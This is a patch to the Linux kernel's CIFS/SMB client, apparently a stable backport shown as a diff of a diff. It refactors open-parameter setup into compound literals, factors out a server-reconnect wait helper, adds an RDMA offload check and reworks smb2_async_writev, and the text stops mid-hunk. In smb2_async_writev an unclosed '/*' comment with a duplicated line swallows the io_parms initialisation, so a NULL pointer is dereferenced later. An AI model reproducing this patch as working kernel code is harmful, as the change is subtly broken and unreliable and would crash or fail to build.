+@@ -271,14 +271,15 @@ cifs_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	int buf_type = CIFS_NO_BUFFER;
+ 	FILE_ALL_INFO file_info;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_READ;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, &file_info);
+ 	if (rc)
+@@ -313,14 +314,15 @@ cifs_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_open_parms oparms;
+ 	struct cifs_io_parms io_parms = {0};
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_CREATE,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc)
+@@ -355,13 +357,14 @@ smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+ 	struct smb2_file_all_info *pfile_info = NULL;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_READ;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.fid = &fid,
++	};
+ 
+ 	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+ 	if (utf16_path == NULL)
+@@ -421,14 +424,15 @@ smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	if (!utf16_path)
+ 		return -ENOMEM;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
+-	oparms.mode = 0644;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_CREATE,
++		.fid = &fid,
++		.mode = 0644,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+diff --git a/fs/cifs/smb1ops.c b/fs/cifs/smb1ops.c
+index 4cb364454e130..abda6148be10f 100644
+--- a/fs/cifs/smb1ops.c
++++ b/fs/cifs/smb1ops.c
+@@ -576,14 +576,15 @@ static int cifs_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 		if (!(le32_to_cpu(fi.Attributes) & ATTR_REPARSE))
+ 			return 0;
+ 
+-		oparms.tcon = tcon;
+-		oparms.cifs_sb = cifs_sb;
+-		oparms.desired_access = FILE_READ_ATTRIBUTES;
+-		oparms.create_options = cifs_create_options(cifs_sb, 0);
+-		oparms.disposition = FILE_OPEN;
+-		oparms.path = full_path;
+-		oparms.fid = &fid;
+-		oparms.reconnect = false;
++		oparms = (struct cifs_open_parms) {
++			.tcon = tcon,
++			.cifs_sb = cifs_sb,
++			.desired_access = FILE_READ_ATTRIBUTES,
++			.create_options = cifs_create_options(cifs_sb, 0),
++			.disposition = FILE_OPEN,
++			.path = full_path,
++			.fid = &fid,
++		};
+ 
+ 		/* Need to check if this is a symbolic link or not */
+ 		tmprc = CIFS_open(xid, &oparms, &oplock, NULL);
+@@ -823,14 +824,15 @@ smb_set_file_info(struct inode *inode, const char *full_path,
+ 		goto out;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = SYNCHRONIZE | FILE_WRITE_ATTRIBUTES;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = SYNCHRONIZE | FILE_WRITE_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	cifs_dbg(FYI, "calling SetFileInfo since SetPathInfo for times not supported by this server\n");
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+@@ -998,15 +1000,16 @@ cifs_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+ 		goto out;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.create_options = cifs_create_options(cifs_sb,
+-						    OPEN_REPARSE_POINT);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb,
++						      OPEN_REPARSE_POINT),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc)
+@@ -1115,15 +1118,16 @@ cifs_make_node(unsigned int xid, struct inode *inode,
+ 
+ 	cifs_dbg(FYI, "sfu compat create special file\n");
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
+-						    CREATE_OPTION_SPECIAL);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
++						      CREATE_OPTION_SPECIAL),
++		.disposition = FILE_CREATE,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	if (tcon->ses->server->oplocks)
+ 		oplock = REQ_OPLOCK;
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index 6c84d2983166a..e1491440e8f1f 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -104,14 +104,15 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 		goto finished;
+ 	}
+ 
+-	vars->oparms.tcon = tcon;
+-	vars->oparms.desired_access = desired_access;
+-	vars->oparms.disposition = create_disposition;
+-	vars->oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	vars->oparms.fid = &fid;
+-	vars->oparms.reconnect = false;
+-	vars->oparms.mode = mode;
+-	vars->oparms.cifs_sb = cifs_sb;
++	vars->oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = desired_access,
++		.disposition = create_disposition,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++		.mode = mode,
++		.cifs_sb = cifs_sb,
++	};
+ 
+ 	rqst[num_rqst].rq_iov = &vars->open_iov[0];
+ 	rqst[num_rqst].rq_nvec = SMB2_CREATE_IOV_SIZE;
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index 78c2d618eb511..6da495f593e17 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -729,12 +729,13 @@ smb3_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_fid fid;
+ 	struct cached_fid *cfid = NULL;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = open_cached_dir(xid, tcon, "", cifs_sb, false, &cfid);
+ 	if (rc == 0)
+@@ -771,12 +772,13 @@ smb2_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_open_parms oparms;
+ 	struct cifs_fid fid;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+@@ -816,12 +818,13 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 	if (!utf16_path)
+ 		return -ENOMEM;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+ 		       &err_iov, &err_buftype);
+@@ -1097,13 +1100,13 @@ smb2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_WRITE_EA;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_WRITE_EA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -1453,12 +1456,12 @@ smb2_ioctl_query_info(const unsigned int xid,
+ 	rqst[0].rq_iov = &vars->open_iov[0];
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++	};
+ 
+ 	if (qi.flags & PASSTHRU_FSCTL) {
+ 		switch (qi.info_type & FSCTL_DEVICE_ACCESS_MASK) {
+@@ -2088,12 +2091,13 @@ smb3_notify(const unsigned int xid, struct file *pfile,
+ 	}
+ 
+ 	tcon = cifs_sb_master_tcon(cifs_sb);
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL, NULL,
+ 		       NULL);
+@@ -2159,12 +2163,13 @@ smb2_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -2490,12 +2495,13 @@ smb2_query_info_compound(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = desired_access;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = desired_access,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -2623,12 +2629,13 @@ smb311_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
+ 	if (!tcon->posix_extensions)
+ 		return smb2_queryfs(xid, tcon, cifs_sb, buf);
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+@@ -2916,13 +2923,13 @@ smb2_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -3056,13 +3063,13 @@ smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -3196,17 +3203,20 @@ get_smb2_acl_by_path(struct cifs_sb_info *cifs_sb,
+ 		return ERR_PTR(rc);
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = READ_CONTROL;
+-	oparms.disposition = FILE_OPEN;
+-	/*
+-	 * When querying an ACL, even if the file is a symlink we want to open
+-	 * the source not the target, and so the protocol requires that the
+-	 * client specify this flag when opening a reparse point
+-	 */
+-	oparms.create_options = cifs_create_options(cifs_sb, 0) | OPEN_REPARSE_POINT;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = READ_CONTROL,
++		.disposition = FILE_OPEN,
++		/*
++		 * When querying an ACL, even if the file is a symlink
++		 * we want to open the source not the target, and so
++		 * the protocol requires that the client specify this
++		 * flag when opening a reparse point
++		 */
++		.create_options = cifs_create_options(cifs_sb, 0) |
++				  OPEN_REPARSE_POINT,
++		.fid = &fid,
++	};
+ 
+ 	if (info & SACL_SECINFO)
+ 		oparms.desired_access |= SYSTEM_SECURITY;
+@@ -3265,13 +3275,14 @@ set_smb2_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
+ 		return rc;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = access_flags;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = access_flags,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+@@ -5133,15 +5144,16 @@ smb2_make_node(unsigned int xid, struct inode *inode,
+ 
+ 	cifs_dbg(FYI, "sfu compat create special file\n");
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
+-						    CREATE_OPTION_SPECIAL);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
++						      CREATE_OPTION_SPECIAL),
++		.disposition = FILE_CREATE,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	if (tcon->ses->server->oplocks)
+ 		oplock = REQ_OPLOCK;
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 2c9ffa921e6f6..23926f754d2aa 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -139,6 +139,66 @@ out:
+ 	return;
+ }
+ 
++static int wait_for_server_reconnect(struct TCP_Server_Info *server,
++				     __le16 smb2_command, bool retry)
++{
++	int timeout = 10;
++	int rc;
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus != CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		return 0;
++	}
++	timeout *= server->nr_targets;
++	spin_unlock(&server->srv_lock);
++
++	/*
++	 * Return to the caller for TREE_DISCONNECT, LOGOFF and CLOSE here
++	 * since they are implicitly done when the session drops.
++	 */
++	switch (smb2_command) {
++	/*
++	 * BB Should we keep oplock break and add flush to exceptions?
++	 */
++	case SMB2_TREE_DISCONNECT:
++	case SMB2_CANCEL:
++	case SMB2_CLOSE:
++	case SMB2_OPLOCK_BREAK:
++		return -EAGAIN;
++	}
++
++	/*
++	 * Give the demultiplex thread up to 10 seconds for each target available
++	 * for reconnect -- should be greater than the cifs socket timeout, which
++	 * is 7 seconds.
++	 *
++	 * On "soft" mounts we wait once.  Hard mounts keep retrying until the
++	 * process is killed or the server comes back on-line.
++	 */
++	do {
++		rc = wait_event_interruptible_timeout(server->response_q,
++						      (server->tcpStatus != CifsNeedReconnect),
++						      timeout * HZ);
++		if (rc < 0) {
++			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
++				 __func__);
++			return -ERESTARTSYS;
++		}
++
++		/* are we still trying to reconnect? */
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus != CifsNeedReconnect) {
++			spin_unlock(&server->srv_lock);
++			return 0;
++		}
++		spin_unlock(&server->srv_lock);
++	} while (retry);
++
++	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
++	return -EHOSTDOWN;
++}
++
+ static int
+ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	       struct TCP_Server_Info *server)
+@@ -146,7 +206,6 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	int rc = 0;
+ 	struct nls_table *nls_codepage;
+ 	struct cifs_ses *ses;
+-	int retries;
+ 
+ 	/*
+ 	 * SMB2s NegProt, SessSetup, Logoff do not have tcon yet so
+@@ -184,61 +243,11 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	    (!tcon->ses->server) || !server)
+ 		return -EIO;
+ 
+-	ses = tcon->ses;
+-	retries = server->nr_targets;
+-
+-	/*
+-	 * Give demultiplex thread up to 10 seconds to each target available for
+-	 * reconnect -- should be greater than cifs socket timeout which is 7
+-	 * seconds.
+-	 */
+-	while (server->tcpStatus == CifsNeedReconnect) {
+-		/*
+-		 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
+-		 * here since they are implicitly done when session drops.
+-		 */
+-		switch (smb2_command) {
+-		/*
+-		 * BB Should we keep oplock break and add flush to exceptions?
+-		 */
+-		case SMB2_TREE_DISCONNECT:
+-		case SMB2_CANCEL:
+-		case SMB2_CLOSE:
+-		case SMB2_OPLOCK_BREAK:
+-			return -EAGAIN;
+-		}
+-
+-		rc = wait_event_interruptible_timeout(server->response_q,
+-						      (server->tcpStatus != CifsNeedReconnect),
+-						      10 * HZ);
+-		if (rc < 0) {
+-			cifs_dbg(FYI, "%s: aborting reconnect due to a received signal by the process\n",
+-				 __func__);
+-			return -ERESTARTSYS;
+-		}
+-
+-		/* are we still trying to reconnect? */
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			break;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		if (retries && --retries)
+-			continue;
++	rc = wait_for_server_reconnect(server, smb2_command, tcon->retry);
++	if (rc)
++		return rc;
+ 
+-		/*
+-		 * on "soft" mounts we wait once. Hard mounts keep
+-		 * retrying until process is killed or server comes
+-		 * back on-line
+-		 */
+-		if (!tcon->retry) {
+-			cifs_dbg(FYI, "gave up waiting on reconnect in smb_init\n");
+-			return -EHOSTDOWN;
+-		}
+-		retries = server->nr_targets;
+-	}
++	ses = tcon->ses;
+ 
+ 	spin_lock(&ses->chan_lock);
+ 	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+@@ -3898,7 +3907,7 @@ void smb2_reconnect_server(struct work_struct *work)
+ 		goto done;
+ 
+ 	/* allocate a dummy tcon struct used for reconnect */
+-	tcon = kzalloc(sizeof(struct cifs_tcon), GFP_KERNEL);
++	tcon = tconInfoAlloc();
+ 	if (!tcon) {
+ 		resched = true;
+ 		list_for_each_entry_safe(ses, ses2, &tmp_ses_list, rlist) {
+@@ -3921,7 +3930,7 @@ void smb2_reconnect_server(struct work_struct *work)
+ 		list_del_init(&ses->rlist);
+ 		cifs_put_smb_ses(ses);
+ 	}
+-	kfree(tcon);
++	tconInfoFree(tcon);
+ 
+ done:
+ 	cifs_dbg(FYI, "Reconnecting tcons and channels finished\n");
+@@ -4054,6 +4063,36 @@ SMB2_flush(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
+ 	return rc;
+ }
+ 
++#ifdef CONFIG_CIFS_SMB_DIRECT
++static inline bool smb3_use_rdma_offload(struct cifs_io_parms *io_parms)
++{
++	struct TCP_Server_Info *server = io_parms->server;
++	struct cifs_tcon *tcon = io_parms->tcon;
++
++	/* we can only offload if we're connected */
++	if (!server || !tcon)
++		return false;
++
++	/* we can only offload on an rdma connection */
++	if (!server->rdma || !server->smbd_conn)
++		return false;
++
++	/* we don't support signed offload yet */
++	if (server->sign)
++		return false;
++
++	/* we don't support encrypted offload yet */
++	if (smb3_encryption_required(tcon))
++		return false;
++
++	/* offload also has its overhead, so only do it if desired */
++	if (io_parms->length < server->smbd_conn->rdma_readwrite_threshold)
++		return false;
++
++	return true;
++}
++#endif /* CONFIG_CIFS_SMB_DIRECT */
++
+ /*
+  * To form a chain of read requests, any read requests after the first should
+  * have the end_of_chain boolean set to true.
+@@ -4097,9 +4136,7 @@ smb2_new_read_req(void **buf, unsigned int *total_len,
+ 	 * If we want to do a RDMA write, fill in and append
+ 	 * smbd_buffer_descriptor_v1 to the end of read request
+ 	 */
+-	if (server->rdma && rdata && !server->sign &&
+-		rdata->bytes >= server->smbd_conn->rdma_readwrite_threshold) {
+-
++	if (smb3_use_rdma_offload(io_parms)) {
+ 		struct smbd_buffer_descriptor_v1 *v1;
+ 		bool need_invalidate = server->dialect == SMB30_PROT_ID;
+ 
+@@ -4495,10 +4532,27 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 	struct kvec iov[1];
+ 	struct smb_rqst rqst = { };
+ 	unsigned int total_len;
++	struct cifs_io_parms _io_parms;
++	struct cifs_io_parms *io_parms = NULL;
+ 
+ 	if (!wdata->server)
+ 		server = wdata->server = cifs_pick_channel(tcon->ses);
+ 
++	/*
++	 * in future we may get cifs_io_parms passed in from the caller,
++	 * In the future we may get cifs_io_parms passed in from the caller,
++	 * but for now we construct it here...
++	_io_parms = (struct cifs_io_parms) {
++		.tcon = tcon,
++		.server = server,
++		.offset = wdata->offset,
++		.length = wdata->bytes,
++		.persistent_fid = wdata->cfile->fid.persistent_fid,
++		.volatile_fid = wdata->cfile->fid.volatile_fid,
++		.pid = wdata->pid,
++	};
++	io_parms = &_io_parms;
++
+ 	rc = smb2_plain_req_init(SMB2_WRITE, tcon, server,
+ 				 (void **) &req, &total_len);
+ 	if (rc)
+@@ -4508,28 +4562,31 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 		flags |= CIFS_TRANSFORM_REQ;
+ 
+ 	shdr = (struct smb2_hdr *)req;
+-	shdr->Id.SyncId.ProcessId = cpu_to_le32(wdata->cfile->pid);
++	shdr->Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
+ 
+-	req->PersistentFileId = wdata->cfile->fid.persistent_fid;
+-	req->VolatileFileId = wdata->cfile->fid.volatile_fid;
++	req->PersistentFileId = io_parms->persistent_fid;
++	req->VolatileFileId = io_parms->volatile_fid;
+ 	req->WriteChannelInfoOffset = 0;
+ 	req->WriteChannelInfoLength = 0;
+ 	req->Channel = 0;
+-	req->Offset = cpu_to_le64(wdata->offset);
++	req->Offset = cpu_to_le64(io_parms->offset);
+ 	req->DataOffset = cpu_to_le16(
+ 				offsetof(struct smb2_write_req, Buffer));
+ 	req->RemainingBytes = 0;
+ 
+-	trace_smb3_write_enter(0 /* xid */, wdata->cfile->fid.persistent_fid,
+-		tcon->tid, tcon->ses->Suid, wdata->offset, wdata->bytes);
++	trace_smb3_write_enter(0 /* xid */,
++			       io_parms->persistent_fid,
++			       io_parms->tcon->tid,
++			       io_parms->tcon->ses->Suid,
++			       io_parms->offset,
++			       io_parms->length);
++
+ #ifdef CONFIG_CIFS_SMB_DIRECT
+ 	/*
